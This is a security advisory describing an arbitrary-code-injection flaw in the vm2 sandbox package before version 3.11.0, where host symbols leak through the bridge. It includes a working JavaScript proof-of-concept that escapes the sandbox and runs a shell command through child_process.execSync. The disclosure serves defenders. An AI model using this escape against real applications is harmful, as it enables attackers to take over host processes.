Arbitrary Code Injection Affecting vm2 package, versions <3.11.0

vm2 is a sandbox that can run untrusted code with whitelisted Node's built-in modules.

Affected versions of this package are vulnerable to Arbitrary Code Injection through the lib/bridge.js value-conversion paths. An attacker can extract the host Symbol.for('nodejs.util.inspect.custom') or Symbol.for('nodejs.rejection') by calling host reflection APIs on Buffer.prototype and then using that symbol as a computed property key to trigger host-side util.inspect or rejection handling with attacker-controlled callbacks. The vulnerable bridge passes raw host symbol primitives into sandbox code from host return values, iterator results, descriptor objects, and throw paths, allowing the dangerous symbol to survive into plain sandbox objects and be reused as a live key. In the affected VM environment, this leads to sandbox escape and arbitrary code execution in the host process.

Note: Constructor access was partially blocked in version 3.10.5, but this bypasses the protection introduced there.

const g = {}.__lookupGetter__;
const a = Buffer.apply;
const p = a.apply(g, [Buffer, ['__proto__']]);
const o = p.call(p.call(a));
const HObject = o.constructor;
sym = HObject.getOwnPropertySymbols(Buffer.prototype).at(0);

const obj = {
    [sym]: (depth, opt, inspect) => {
        inspect.constructor("return process.getBuiltinModule('child_process').execSync('ls',{stdio:'inherit'})")();
    },
    valueOf: undefined,
    constructor: undefined,
};

WebAssembly.compileStreaming(obj).catch(() => {});

• GitHub Commit
• GitHub Commit
• GitHub Release
• Maintainer's Advisory